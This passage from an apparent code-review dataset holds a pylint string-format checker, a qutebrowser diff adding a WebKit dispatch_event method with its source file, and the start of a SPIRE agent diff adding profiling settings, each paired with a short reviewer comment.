specifiers " "is used with a dictionary that doesn't contain all the keys " "required by the format string.", ), "E1305": ( "Too many arguments for format string", "too-many-format-args", "Used when a format string that uses unnamed conversion " "specifiers is given too many arguments.", ), "E1306": ( "Not enough arguments for format string", "too-few-format-args", "Used when a format string that uses unnamed conversion " "specifiers is given too few arguments", ), "E1307": ( "Argument %r does not match format type %r", "bad-string-format-type", "Used when a type required by format string " "is not suitable for actual argument type", ), "E1310": ( "Suspicious argument in %s.%s call", "bad-str-strip-call", "The argument to a str.{l,r,}strip call contains a duplicate character, ", ), "W1302": ( "Invalid format string", "bad-format-string", "Used when a PEP 3101 format string is invalid.", ), "W1303": ( "Missing keyword argument %r for format string", "missing-format-argument-key", "Used when a PEP 3101 format string that uses named fields " "doesn't receive one or more required keywords.", ), "W1304": ( "Unused format argument %r", "unused-format-string-argument", "Used when a PEP 3101 format string that uses named " "fields is used with an argument that " "is not required by the format string.", ), "W1305": ( "Format string contains both automatic field numbering " "and manual field specification", "format-combined-specification", "Used when a PEP 3101 format string contains both automatic " "field numbering (e.g. '{}') and manual field " "specification (e.g. '{0}').", ), "W1306": ( "Missing format attribute %r in format specifier %r", "missing-format-attribute", "Used when a PEP 3101 format string uses an " "attribute specifier ({0.length}), but the argument " "passed for formatting doesn't have that attribute.", ), "W1307": ( "Using invalid lookup key %r in format specifier %r", "invalid-format-index", "Used when a PEP 3101 format string uses a lookup specifier " "({a[1]}), but the argument passed for formatting " "doesn't contain or doesn't have that key as an attribute.", ), "W1308": ( "Duplicate string formatting argument %r, consider passing as named argument", "duplicate-string-formatting-argument", "Used when we detect that a string formatting is " "repeating an argument instead of using named string arguments", ), "W1309": ( "Using an f-string that does not have any interpolated variables", "f-string-without-interpolation", "Used when we detect an f-string that does not use any interpolation variables, " "in which case it can be either a normal string or a bug in the code.", ), } OTHER_NODES = ( astroid.Const, astroid.List, astroid.Lambda, astroid.FunctionDef, astroid.ListComp, astroid.SetComp, astroid.GeneratorExp, ) BUILTINS_STR = BUILTINS + ".str" BUILTINS_FLOAT = BUILTINS + ".float" BUILTINS_INT = BUILTINS + ".int" def get_access_path(key, parts): """Given a list of format specifiers, returns the final access path (e.g. a.b.c[0][1]). """ path = [] for is_attribute, specifier in parts: if is_attribute: path.append(f".{specifier}") else: path.append(f"[{specifier!r}]") return str(key) + "".join(path) def arg_matches_format_type(arg_type, format_type): if format_type in "sr": # All types can be printed with %s and %r return True if isinstance(arg_type, astroid.Instance): arg_type = arg_type.pytype() if arg_type == BUILTINS_STR: return format_type == "c" if arg_type == BUILTINS_FLOAT: return format_type in "deEfFgGn%" if arg_type == BUILTINS_INT: # Integers allow all types return True return False return True class StringFormatChecker(BaseChecker): """Checks string formatting operations to ensure that the format string is valid and the arguments match the format string. """ __implements__ = (IAstroidChecker,) name = "string" msgs = MSGS # pylint: disable=too-many-branches @check_messages( "bad-format-character", "truncated-format-string", "mixed-format-string", "bad-format-string-key", "missing-format-string-key", "unused-format-string-key", "bad-string-format-type", "format-needs-mapping", "too-many-format-args", "too-few-format-args", "bad-string-format-type", ) def visit_binop(self, node): if node.op != "%": return left = node.left args = node.right if not (isinstance(left, astroid.Const) and isinstance(left.value, str)): return format_string = left.value try: ( required_keys, required_num_args, required_key_types, required_arg_types, ) = utils.parse_format_string(format_string) except utils.UnsupportedFormatCharacter as exc: formatted = format_string[exc.index] self.add_message( "bad-format-character", node=node, args=(formatted, ord(formatted), exc.index), ) return except utils.IncompleteFormatString: self.add_message("truncated-format-string", node=node) return if required_keys and required_num_args: # The format string uses both named and unnamed format # specifiers. self.add_message("mixed-format-string", node=node) elif required_keys: # The format string uses only named format specifiers. # Check that the RHS of the % operator is a mapping object # that contains precisely the set of keys required by the # format string. if isinstance(args, astroid.Dict): keys = set() unknown_keys = False for k, _ in args.items: if isinstance(k, astroid.Const): key = k.value if isinstance(key, str): keys.add(key) else: self.add_message( "bad-format-string-key", node=node, args=key ) else: # One of the keys was something other than a # constant. Since we can't tell what it is, # suppress checks for missing keys in the # dictionary. unknown_keys = True if not unknown_keys: for key in required_keys: if key not in keys: self.add_message( "missing-format-string-key", node=node, args=key ) for key in keys: if key not in required_keys: self.add_message( "unused-format-string-key", node=node, args=key ) for key, arg in args.items: if not isinstance(key, astroid.Const): continue format_type = required_key_types.get(key.value, None) arg_type = utils.safe_infer(arg) if ( format_type is not None and arg_type not in (None, astroid.Uninferable) and not arg_matches_format_type(arg_type, format_type) ): self.add_message( "bad-string-format-type", node=node, args=(arg_type.pytype(), format_type), ) elif isinstance(args, (OTHER_NODES, astroid.Tuple)): type_name = type(args).__name__ self.add_message("format-needs-mapping", node=node, args=type_name) # else: # The RHS of the format specifier is a name or # expression. It may be a mapping object, so # there's nothing we can check. else: # The format string uses only unnamed format specifiers. # Check that the number of arguments passed to the RHS of # the % operator matches the number required by the format # string. args_elts = () if isinstance(args, astroid.Tuple): rhs_tuple = utils.safe_infer(args) num_args = None if hasattr(rhs_tuple, "elts"): args_elts = rhs_tuple.elts num_args = len(args_elts) elif isinstance(args, (OTHER_NODES, (astroid.Dict, astroid.DictComp))): args_elts = [args] num_args = 1 else: # The RHS of the format specifier is a name or # expression. It could be a tuple of unknown size, so # there's nothing we can check. num_args = None if num_args is not None: if num_args > required_num_args: self.add_message("too-many-format-args", node=node) elif num_args < required_num_args: self.add_message("too-few-format-args", node=node) for arg, format_type in zip(args_elts, required_arg_types): if not arg: continue arg_type = utils.safe_infer(arg) if ( arg_type not in ( None, astroid.Uninferable, ) and not arg_matches_format_type(arg_type, format_type) ): self.add_message( "bad-string-format-type", node=node, args=(arg_type.pytype(), format_type), ) @check_messages("f-string-without-interpolation") def visit_joinedstr(self, node): if isinstance(node.parent, astroid.FormattedValue): return for value in node.values: if isinstance(value, astroid.FormattedValue): return self.add_message("f-string-without-interpolation", node=node) @check_messages(*MSGS) def visit_call(self, node): func = utils.safe_infer(node.func) if ( isinstance(func, astroid.BoundMethod) and isinstance(func.bound, astroid.Instance) and func.bound.name in ("str", "unicode", "bytes") ): if func.name in ("strip", "lstrip", "rstrip") and node.args: arg = utils.safe_infer(node.args[0]) if not isinstance(arg, astroid.Const) or not isinstance(arg.value, str): return if len(arg.value) != len(set(arg.value)): self.add_message( "bad-str-strip-call", node=node, args=(func.bound.name, func.name), ) elif func.name == "format": self._check_new_format(node, func) def _detect_vacuous_formatting(self, node, positional_arguments): counter = collections.Counter( arg.name for arg in positional_arguments if isinstance(arg, astroid.Name) ) for name, count in counter.items(): if count == 1: continue self.add_message( "duplicate-string-formatting-argument", node=node, args=(name,) ) def _check_new_format(self, node, func): """Check the new string formatting.""" # Skip format nodes which don't have an explicit string on the # left side of the format operation. # We do this because our inference engine can't properly handle # redefinitions of the original string. # Note that there may not be any left side at all, if the format method # has been assigned to another variable. See issue 351. For example: # # fmt = 'some string {}'.format # fmt('arg') if isinstance(node.func, astroid.Attribute) and not isinstance( node.func.expr, astroid.Const ): return if node.starargs or node.kwargs: return try: strnode = next(func.bound.infer()) except astroid.InferenceError: return if not (isinstance(strnode, astroid.Const) and isinstance(strnode.value, str)): return try: call_site = astroid.arguments.CallSite.from_call(node) except astroid.InferenceError: return try: fields, num_args, manual_pos = utils.parse_format_method_string( strnode.value ) except utils.IncompleteFormatString: self.add_message("bad-format-string", node=node) return positional_arguments = call_site.positional_arguments named_arguments = call_site.keyword_arguments named_fields = {field[0] for field in fields if isinstance(field[0], str)} if num_args and manual_pos: self.add_message("format-combined-specification", node=node) return check_args = False # Consider "{[0]} {[1]}" as num_args. num_args += sum(1 for field in named_fields if field == "") if named_fields: for field in named_fields: if field and field not in named_arguments: self.add_message( "missing-format-argument-key", node=node, args=(field,) ) for field in named_arguments: if field not in named_fields: self.add_message( "unused-format-string-argument", node=node, args=(field,) ) # num_args can be 0 if manual_pos is not. num_args = num_args or manual_pos if positional_arguments or num_args: empty = any(True for field in named_fields if field == "") if named_arguments or empty: # Verify the required number of positional arguments # only if the .format got at least one keyword argument. # This means that the format strings accepts both # positional and named fields and we should warn # when one of the them is missing or is extra. check_args = True else: check_args = True if check_args: # num_args can be 0 if manual_pos is not. num_args = num_args or manual_pos if len(positional_arguments) > num_args: self.add_message("too-many-format-args", node=node) elif len(positional_arguments) < num_args: self.add_message("too-few-format-args", node=node) self._detect_vacuous_formatting(node, positional_arguments) self._check_new_format_specifiers(node, fields, named_arguments) def _check_new_format_specifiers(self, node, fields, named): """ Check attribute and index access in the format string ("{0.a}" and "{0[a]}"). """ for key, specifiers in fields: # Obtain the argument. If it can't be obtained # or inferred, skip this check. if key == "": # {[0]} will have an unnamed argument, defaulting # to 0. It will not be present in `named`, so use the value # 0 for it. key = 0 if isinstance(key, numbers.Number): try: argname = utils.get_argument_from_call(node, key) except utils.NoSuchArgumentError: continue else: if key not in named: continue argname = named[key] if argname in (astroid.Uninferable, None): continue try: argument = utils.safe_infer(argname) except astroid.InferenceError: continue if not specifiers or not argument: # No need to check this key if it doesn't # use attribute / item access continue if argument.parent and isinstance(argument.parent, astroid.Arguments): # Ignore any object coming from an argument, # because we can't infer its value properly. continue previous = argument parsed = [] for is_attribute, specifier in specifiers: if previous is astroid.Uninferable: break parsed.append((is_attribute, specifier)) if is_attribute: try: previous = previous.getattr(specifier)[0] except astroid.NotFoundError: if ( hasattr(previous, "has_dynamic_getattr") and previous.has_dynamic_getattr() ): # Don't warn if the object has a custom __getattr__ break path = get_access_path(key, parsed) self.add_message( "missing-format-attribute", args=(specifier, path), node=node, ) break else: warn_error = False if hasattr(previous, "getitem"): try: previous = previous.getitem(astroid.Const(specifier)) except ( astroid.AstroidIndexError, astroid.AstroidTypeError, astroid.AttributeInferenceError, ): warn_error = True except astroid.InferenceError: break if previous is astroid.Uninferable: break else: try: # Lookup __getitem__ in the current node, # but skip further checks, because we can't # retrieve the looked object previous.getattr("__getitem__") break except astroid.NotFoundError: warn_error = True if warn_error: path = get_access_path(key, parsed) self.add_message( "invalid-format-index", args=(specifier, path), node=node ) break try: previous = next(previous.infer()) except astroid.InferenceError: # can't check further if we can't infer it break class StringConstantChecker(BaseTokenChecker): """Check string literals""" __implements__ = (IAstroidChecker, ITokenChecker, IRawChecker) name = "string" msgs = { "W1401": ( "Anomalous backslash in string: '%s'. " "String constant might be missing an r prefix.", "anomalous-backslash-in-string", "Used when a backslash is in a literal string but not as an escape.", ), "W1402": ( "Anomalous Unicode escape in byte string: '%s'. " "String constant might be missing an r or u prefix.", "anomalous-unicode-escape-in-string", "Used when an escape like \\u is encountered in a byte " "string where it has no effect.", ), "W1404": ( "Implicit string concatenation found in %s", "implicit-str-concat", "String literals are implicitly concatenated in a " "literal iterable definition : " "maybe a comma is missing ?", {"old_names": [("W1403", "implicit-str-concat-in-sequence")]}, ), "W1405": ( "Quote delimiter %s is inconsistent with the rest of the file", "inconsistent-quotes", "Quote delimiters are not used consistently throughout a module " "(with allowances made for avoiding unnecessary escaping).", ), } options = ( ( "check-str-concat-over-line-jumps", { "default": False, "type": "yn", "metavar": "<y_or_n>", "help": "This flag controls whether the " "implicit-str-concat should generate a warning " "on implicit string concatenation in sequences defined over " "several lines.", }, ), ( "check-quote-consistency", { "default": False, "type": "yn", "metavar": "<y_or_n>", "help": "This flag controls whether inconsistent-quotes generates a " "warning when the character used as a quote delimiter is used " "inconsistently within a module.", }, ), ) # Characters that have a special meaning after a backslash in either # Unicode or byte strings. ESCAPE_CHARACTERS = "abfnrtvx\n\r\t\\'\"01234567" # Characters that have a special meaning after a backslash but only in # Unicode strings. UNICODE_ESCAPE_CHARACTERS = "uUN" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.string_tokens = {} # token position -> (token value, next token) def process_module(self, module): self._unicode_literals = "unicode_literals" in module.future_imports def process_tokens(self, tokens): encoding = "ascii" for i, (tok_type, token, start, _, line) in enumerate(tokens): if tok_type == tokenize.ENCODING: # this is always the first token processed encoding = token elif tok_type == tokenize.STRING: # 'token' is the whole un-parsed token; we can look at the start # of it to see whether it's a raw or unicode string etc. self.process_string_token(token, start[0], start[1]) # We figure the next token, ignoring comments & newlines: j = i + 1 while j < len(tokens) and tokens[j].type in ( tokenize.NEWLINE, tokenize.NL, tokenize.COMMENT, ): j += 1 next_token = tokens[j] if j < len(tokens) else None if encoding != "ascii": # We convert `tokenize` character count into a byte count, # to match with astroid `.col_offset` start = (start[0], len(line[: start[1]].encode(encoding))) self.string_tokens[start] = (str_eval(token), next_token) if self.config.check_quote_consistency: self.check_for_consistent_string_delimiters(tokens) @check_messages("implicit-str-concat") def visit_list(self, node): self.check_for_concatenated_strings(node.elts, "list") @check_messages("implicit-str-concat") def visit_set(self, node): self.check_for_concatenated_strings(node.elts, "set") @check_messages("implicit-str-concat") def visit_tuple(self, node): self.check_for_concatenated_strings(node.elts, "tuple") def visit_assign(self, node): if isinstance(node.value, astroid.Const) and isinstance(node.value.value, str): self.check_for_concatenated_strings([node.value], "assignment") def check_for_consistent_string_delimiters( self, tokens: Iterable[tokenize.TokenInfo] ) -> None: """Adds a message for each string using inconsistent quote delimiters. Quote delimiters are used inconsistently if " and ' are mixed in a module's shortstrings without having done so to avoid escaping an internal quote character. Args: tokens: The tokens to be checked against for consistent usage. """ # typing.Counter added in Python 3.6.1 so this type hint must be a comment string_delimiters = collections.Counter() # type: Counter[str] # First, figure out which quote character predominates in the module for tok_type, token, _, _, _ in tokens: if tok_type == tokenize.STRING and _is_quote_delimiter_chosen_freely(token): string_delimiters[_get_quote_delimiter(token)] += 1 if len(string_delimiters) > 1: # Ties are broken arbitrarily most_common_delimiter = string_delimiters.most_common(1)[0][0] for tok_type, token, start, _, _ in tokens: if tok_type != tokenize.STRING: continue quote_delimiter = _get_quote_delimiter(token) if ( _is_quote_delimiter_chosen_freely(token) and quote_delimiter != most_common_delimiter ): self.add_message( "inconsistent-quotes", line=start[0], args=(quote_delimiter,) ) def check_for_concatenated_strings(self, elements, iterable_type): for elt in elements: if not ( isinstance(elt, astroid.Const) and elt.pytype() in _AST_NODE_STR_TYPES ): continue if elt.col_offset < 0: # This can happen in case of escaped newlines continue if (elt.lineno, elt.col_offset) not in self.string_tokens: # This may happen with Latin1 encoding # cf. https://github.com/PyCQA/pylint/issues/2610 continue matching_token, next_token = self.string_tokens[ (elt.lineno, elt.col_offset) ] # We detect string concatenation: the AST Const is the # combination of 2 string tokens if matching_token != elt.value and next_token is not None: if next_token.type == tokenize.STRING and ( next_token.start[0] == elt.lineno or self.config.check_str_concat_over_line_jumps ): self.add_message( "implicit-str-concat", line=elt.lineno, args=(iterable_type,) ) def process_string_token(self, token, start_row, start_col): quote_char = None index = None for index, char in enumerate(token): if char in "'\"": quote_char = char break if quote_char is None: return prefix = token[:index].lower() # markers like u, b, r. after_prefix = token[index:] # Chop off quotes quote_length = ( 3 if after_prefix[:3] == after_prefix[-3:] == 3 * quote_char else 1 ) string_body = after_prefix[quote_length:-quote_length] # No special checks on raw strings at the moment. if "r" not in prefix: self.process_non_raw_string_token( prefix, string_body, start_row, start_col + len(prefix) + quote_length, ) def process_non_raw_string_token( self, prefix, string_body, start_row, string_start_col ): """check for bad escapes in a non-raw string. prefix: lowercase string of eg 'ur' string prefix markers. string_body: the un-parsed body of the string, not including the quote marks. start_row: integer line number in the source. string_start_col: integer col number of the string start in the source. """ # Walk through the string; if we see a backslash then escape the next # character, and skip over it. If we see a non-escaped character, # alert, and continue. # # Accept a backslash when it escapes a backslash, or a quote, or # end-of-line, or one of the letters that introduce a special escape # sequence <https://docs.python.org/reference/lexical_analysis.html> # index = 0 while True: index = string_body.find("\\", index) if index == -1: break # There must be a next character; having a backslash at the end # of the string would be a SyntaxError. next_char = string_body[index + 1] match = string_body[index : index + 2] # The column offset will vary depending on whether the string token # is broken across lines. Calculate relative to the nearest line # break or relative to the start of the token's line. last_newline = string_body.rfind("\n", 0, index) if last_newline == -1: line = start_row col_offset = index + string_start_col else: line = start_row + string_body.count("\n", 0, index) col_offset = index - last_newline - 1 if next_char in self.UNICODE_ESCAPE_CHARACTERS: if "u" in prefix: pass elif "b" not in prefix: pass # unicode by default else: self.add_message( "anomalous-unicode-escape-in-string", line=line, args=(match,), col_offset=col_offset, ) elif next_char not in self.ESCAPE_CHARACTERS: self.add_message( "anomalous-backslash-in-string", line=line, args=(match,), col_offset=col_offset, ) # Whether it was a valid escape or not, backslash followed by # another character can always be consumed whole: the second # character can never be the start of a new backslash escape. index += 2 def register(linter): """required method to auto register this checker""" linter.register_checker(StringFormatChecker(linter)) linter.register_checker(StringConstantChecker(linter)) def str_eval(token): """ Mostly replicate `ast.literal_eval(token)` manually to avoid any performance hit. This supports f-strings, contrary to `ast.literal_eval`. We have to support all string literal notations: https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals """ if token[0:2].lower() in ("fr", "rf"): token = token[2:] elif token[0].lower() in ("r", "u", "f"): token = token[1:] if token[0:3] in ('"""', "'''"): return token[3:-3] return token[1:-1] def _is_long_string(string_token: str) -> bool: """Is this string token a "longstring" (is it triple-quoted)? Long strings are triple-quoted as defined in https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals This function only checks characters up through the open quotes. Because it's meant to be applied only to tokens that represent string literals, it doesn't bother to check for close-quotes (demonstrating that the literal is a well-formed string). Args: string_token: The string token to be parsed. Returns: A boolean representing whether or not this token matches a longstring regex. """ return bool( SINGLE_QUOTED_REGEX.match(string_token) or DOUBLE_QUOTED_REGEX.match(string_token) ) def _get_quote_delimiter(string_token: str) -> str: """Returns the quote character used to delimit this token string. This function does little checking for whether the token is a well-formed string. Args: string_token: The token to be parsed. Returns: A string containing solely the first quote delimiter character in the passed string. Raises: ValueError: No quote delimiter characters are present. """ match = QUOTE_DELIMITER_REGEX.match(string_token) if not match: raise ValueError("string token %s is not a well-formed string" % string_token) return match.group(2) def _is_quote_delimiter_chosen_freely(string_token: str) -> bool: """Was there a non-awkward option for the quote delimiter? Args: string_token: The quoted string whose delimiters are to be checked. Returns: Whether there was a choice in this token's quote character that would not have involved backslash-escaping an interior quote character. Long strings are excepted from this analysis under the assumption that their quote characters are set by policy. """ quote_delimiter = _get_quote_delimiter(string_token) unchosen_delimiter = '"' if quote_delimiter == "'" else "'" return bool( quote_delimiter and not _is_long_string(string_token) and unchosen_delimiter not in str_eval(string_token) )
1
14,958
This is done automatically, you can skip it next time ;)
PyCQA-pylint
py
@@ -128,6 +128,14 @@ class WebKitElement(webelem.AbstractWebElement): value = javascript.string_escape(value) self._elem.evaluateJavaScript("this.value='{}'".format(value)) + def dispatch_event(self, event): + self._check_vanished() + if self._tab.is_deleted(): + raise webelem.OrphanedError("Tab containing element vanished") + log.webelem.debug("Firing event on {!r} via javascript.".format(self)) + self._elem.evaluateJavaScript("this.dispatchEvent(new Event('{}'))" + .format(event)) + def caret_position(self): """Get the text caret position for the current element.""" self._check_vanished()
1
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2014-2018 Florian Bruhin (The Compiler) <[email protected]> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """QtWebKit specific part of the web element API.""" from PyQt5.QtCore import QRect from PyQt5.QtWebKit import QWebElement, QWebSettings from qutebrowser.config import config from qutebrowser.utils import log, utils, javascript from qutebrowser.browser import webelem class IsNullError(webelem.Error): """Gets raised by WebKitElement if an element is null.""" pass class WebKitElement(webelem.AbstractWebElement): """A wrapper around a QWebElement.""" def __init__(self, elem, tab): super().__init__(tab) if isinstance(elem, self.__class__): raise TypeError("Trying to wrap a wrapper!") if elem.isNull(): raise IsNullError('{} is a null element!'.format(elem)) self._elem = elem def __str__(self): self._check_vanished() return self._elem.toPlainText() def __eq__(self, other): if not isinstance(other, WebKitElement): return NotImplemented return self._elem == other._elem # pylint: disable=protected-access def __getitem__(self, key): self._check_vanished() if key not in self: raise KeyError(key) return self._elem.attribute(key) def __setitem__(self, key, val): self._check_vanished() self._elem.setAttribute(key, val) def __delitem__(self, key): self._check_vanished() if key not in self: raise KeyError(key) self._elem.removeAttribute(key) def __contains__(self, key): self._check_vanished() return self._elem.hasAttribute(key) def __iter__(self): self._check_vanished() yield from self._elem.attributeNames() def __len__(self): self._check_vanished() return len(self._elem.attributeNames()) def _check_vanished(self): """Raise an exception if the element vanished (is null).""" if self._elem.isNull(): raise IsNullError('Element {} vanished!'.format(self._elem)) def has_frame(self): self._check_vanished() return self._elem.webFrame() is not None def geometry(self): self._check_vanished() return self._elem.geometry() def classes(self): self._check_vanished() return self._elem.classes() def tag_name(self): """Get the tag name for the current element.""" self._check_vanished() return self._elem.tagName().lower() def outer_xml(self): """Get the full HTML representation of this element.""" self._check_vanished() return self._elem.toOuterXml() def value(self): self._check_vanished() val = self._elem.evaluateJavaScript('this.value') assert isinstance(val, (int, float, str, type(None))), val return val def set_value(self, value): self._check_vanished() if self._tab.is_deleted(): raise webelem.OrphanedError("Tab containing element vanished") if self.is_content_editable(): log.webelem.debug("Filling {!r} via set_text.".format(self)) self._elem.setPlainText(value) else: log.webelem.debug("Filling {!r} via javascript.".format(self)) value = javascript.string_escape(value) self._elem.evaluateJavaScript("this.value='{}'".format(value)) def caret_position(self): """Get the text caret position for the current element.""" self._check_vanished() pos = self._elem.evaluateJavaScript('this.selectionStart') if pos is None: return 0 return int(pos) def insert_text(self, text): self._check_vanished() if not self.is_editable(strict=True): raise webelem.Error("Element is not editable!") log.webelem.debug("Inserting text into element {!r}".format(self)) self._elem.evaluateJavaScript(""" var text = "{}"; var event = document.createEvent("TextEvent"); event.initTextEvent("textInput", true, true, null, text); this.dispatchEvent(event); """.format(javascript.string_escape(text))) def _parent(self): """Get the parent element of this element.""" self._check_vanished() elem = self._elem.parent() if elem is None or elem.isNull(): return None return WebKitElement(elem, tab=self._tab) def _rect_on_view_js(self): """Javascript implementation for rect_on_view.""" # FIXME:qtwebengine maybe we can reuse this? rects = self._elem.evaluateJavaScript("this.getClientRects()") if rects is None: # pragma: no cover # On e.g. Void Linux with musl libc, the stack size is too small # for jsc, and running JS will fail. If that happens, fall back to # the Python implementation. # https://github.com/qutebrowser/qutebrowser/issues/1641 return None text = utils.compact_text(self._elem.toOuterXml(), 500) log.webelem.vdebug("Client rectangles of element '{}': {}".format( text, rects)) for i in range(int(rects.get("length", 0))): rect = rects[str(i)] width = rect.get("width", 0) height = rect.get("height", 0) if width > 1 and height > 1: # fix coordinates according to zoom level zoom = self._elem.webFrame().zoomFactor() if not config.val.zoom.text_only: rect["left"] *= zoom rect["top"] *= zoom width *= zoom height *= zoom rect = QRect(rect["left"], rect["top"], width, height) frame = self._elem.webFrame() while frame is not None: # Translate to parent frames' position (scroll position # is taken care of inside getClientRects) rect.translate(frame.geometry().topLeft()) frame = frame.parentFrame() return rect return None def _rect_on_view_python(self, elem_geometry): """Python implementation for rect_on_view.""" if elem_geometry is None: geometry = self._elem.geometry() else: geometry = elem_geometry frame = self._elem.webFrame() rect = QRect(geometry) while frame is not None: rect.translate(frame.geometry().topLeft()) rect.translate(frame.scrollPosition() * -1) frame = frame.parentFrame() return rect def rect_on_view(self, *, elem_geometry=None, no_js=False): """Get the geometry of the element relative to the webview. Uses the getClientRects() JavaScript method to obtain the collection of rectangles containing the element and returns the first rectangle which is large enough (larger than 1px times 1px). If all rectangles returned by getClientRects() are too small, falls back to elem.rect_on_view(). Skipping of small rectangles is due to <a> elements containing other elements with "display:block" style, see https://github.com/qutebrowser/qutebrowser/issues/1298 Args: elem_geometry: The geometry of the element, or None. Calling QWebElement::geometry is rather expensive so we want to avoid doing it twice. no_js: Fall back to the Python implementation """ self._check_vanished() # First try getting the element rect via JS, as that's usually more # accurate if elem_geometry is None and not no_js: rect = self._rect_on_view_js() if rect is not None: return rect # No suitable rects found via JS, try via the QWebElement API return self._rect_on_view_python(elem_geometry) def _is_visible(self, mainframe): """Check if the given element is visible in the given frame. This is not public API because it can't be implemented easily here with QtWebEngine, and is only used via find_css(..., only_visible=True) via the tab API. """ self._check_vanished() # CSS attributes which hide an element hidden_attributes = { 'visibility': 'hidden', 'display': 'none', 'opacity': '0', } for k, v in hidden_attributes.items(): if (self._elem.styleProperty(k, QWebElement.ComputedStyle) == v and 'ace_text-input' not in self.classes()): return False elem_geometry = self._elem.geometry() if not elem_geometry.isValid() and elem_geometry.x() == 0: # Most likely an invisible link return False # First check if the element is visible on screen elem_rect = self.rect_on_view(elem_geometry=elem_geometry) mainframe_geometry = mainframe.geometry() if elem_rect.isValid(): visible_on_screen = mainframe_geometry.intersects(elem_rect) else: # We got an invalid rectangle (width/height 0/0 probably), but this # can still be a valid link. visible_on_screen = mainframe_geometry.contains( elem_rect.topLeft()) # Then check if it's visible in its frame if it's not in the main # frame. elem_frame = self._elem.webFrame() framegeom = QRect(elem_frame.geometry()) if not framegeom.isValid(): visible_in_frame = False elif elem_frame.parentFrame() is not None: framegeom.moveTo(0, 0) framegeom.translate(elem_frame.scrollPosition()) if elem_geometry.isValid(): visible_in_frame = framegeom.intersects(elem_geometry) else: # We got an invalid rectangle (width/height 0/0 probably), but # this can still be a valid link. visible_in_frame = framegeom.contains(elem_geometry.topLeft()) else: visible_in_frame = visible_on_screen return all([visible_on_screen, visible_in_frame]) def remove_blank_target(self): elem = self for _ in range(5): if elem is None: break if elem.is_link(): if elem.get('target', None) == '_blank': elem['target'] = '_top' break elem = elem._parent() # pylint: disable=protected-access def _move_text_cursor(self): if self.is_text_input() and self.is_editable(): self._tab.caret.move_to_end_of_document() def _requires_user_interaction(self): return False def _click_editable(self, click_target): ok = self._elem.evaluateJavaScript('this.focus(); true;') if ok: self._move_text_cursor() else: log.webelem.debug("Failed to focus via JS, falling back to event") self._click_fake_event(click_target) def _click_js(self, click_target): settings = QWebSettings.globalSettings() attribute = QWebSettings.JavascriptCanOpenWindows could_open_windows = settings.testAttribute(attribute) settings.setAttribute(attribute, True) ok = self._elem.evaluateJavaScript('this.click(); true;') settings.setAttribute(attribute, could_open_windows) if not ok: log.webelem.debug("Failed to click via JS, falling back to event") self._click_fake_event(click_target) def _click_fake_event(self, click_target): self._tab.data.override_target = click_target super()._click_fake_event(click_target) def get_child_frames(startframe): """Get all children recursively of a given QWebFrame. Loosely based on http://blog.nextgenetics.net/?e=64 Args: startframe: The QWebFrame to start with. Return: A list of children QWebFrame, or an empty list. """ results = [] frames = [startframe] while frames: new_frames = [] for frame in frames: results.append(frame) new_frames += frame.childFrames() frames = new_frames return results
1
22,198
This is needed in `set_value` because of `:open-editor` (you could open an editor, close the tab, then close the editor). I don't think it makes any sense to have it here?
qutebrowser-qutebrowser
py
@@ -53,6 +53,10 @@ type agentConfig struct { ConfigPath string Umask string `hcl:"umask"` + + ProfilingEnabled string `hcl:"profiling_enabled"` + ProfilingPort string `hcl:"profiling_port"` + ProfilingFreq string `hcl:"profiling_freq"` } type RunCLI struct {
1
package run import ( "crypto/x509" "encoding/pem" "errors" "flag" "fmt" "io/ioutil" "net" "net/url" "os" "os/signal" "path/filepath" "strconv" "syscall" "github.com/hashicorp/hcl" "github.com/spiffe/spire/pkg/agent" "github.com/spiffe/spire/pkg/common/catalog" "github.com/spiffe/spire/pkg/common/log" ) const ( defaultConfigPath = "conf/agent/agent.conf" defaultSocketPath = "./spire_api" // TODO: Make my defaults sane defaultDataDir = "." defaultLogLevel = "INFO" defaultUmask = 0077 ) // RunConfig represents the available configurables for file // and CLI options type runConfig struct { AgentConfig agentConfig `hcl:"agent"` PluginConfigs catalog.PluginConfigMap `hcl:"plugins"` } type agentConfig struct { ServerAddress string `hcl:"server_address"` ServerPort int `hcl:"server_port"` TrustDomain string `hcl:"trust_domain"` TrustBundlePath string `hcl:"trust_bundle_path"` JoinToken string `hcl:"join_token"` SocketPath string `hcl:"socket_path"` DataDir string `hcl:"data_dir"` LogFile string `hcl:"log_file"` LogLevel string `hcl:"log_level"` ConfigPath string Umask string `hcl:"umask"` } type RunCLI struct { } func (*RunCLI) Help() string { _, err := parseFlags([]string{"-h"}) return err.Error() } func (*RunCLI) Run(args []string) int { cliConfig, err := parseFlags(args) if err != nil { fmt.Println(err.Error()) return 1 } fileConfig, err := parseFile(cliConfig.AgentConfig.ConfigPath) if err != nil { fmt.Println(err.Error()) return 1 } c := newDefaultConfig() // Get the plugin configurations from the file c.PluginConfigs = fileConfig.PluginConfigs err = mergeConfigs(c, fileConfig, cliConfig) if err != nil { fmt.Println(err.Error()) } err = validateConfig(c) if err != nil { fmt.Println(err.Error()) } agt := agent.New(c) signalListener(agt) err = agt.Run() if err != nil { c.Log.Errorf("agent crashed: %v", err) return 1 } c.Log.Infof("Agent stopped gracefully") return 0 } func (*RunCLI) Synopsis() string { return "Runs the agent" } func parseFile(filePath string) (*runConfig, error) { c := &runConfig{} // Return a friendly error if the file is missing if _, err := os.Stat(filePath); os.IsNotExist(err) { msg := "could not find config file %s: please use the -config flag" p, err := filepath.Abs(filePath) if err != nil { p = filePath msg = "could not determine CWD; config file not found at %s: use -config" } return nil, fmt.Errorf(msg, p) } data, err := ioutil.ReadFile(filePath) if err != nil { return nil, err } hclTree, err := hcl.Parse(string(data)) if err != nil { return nil, err } if err := hcl.DecodeObject(&c, hclTree); err != nil { return nil, err } return c, nil } func parseFlags(args []string) (*runConfig, error) { flags := flag.NewFlagSet("run", flag.ContinueOnError) c := &runConfig{} flags.StringVar(&c.AgentConfig.ServerAddress, "serverAddress", "", "IP address or DNS name of the SPIRE 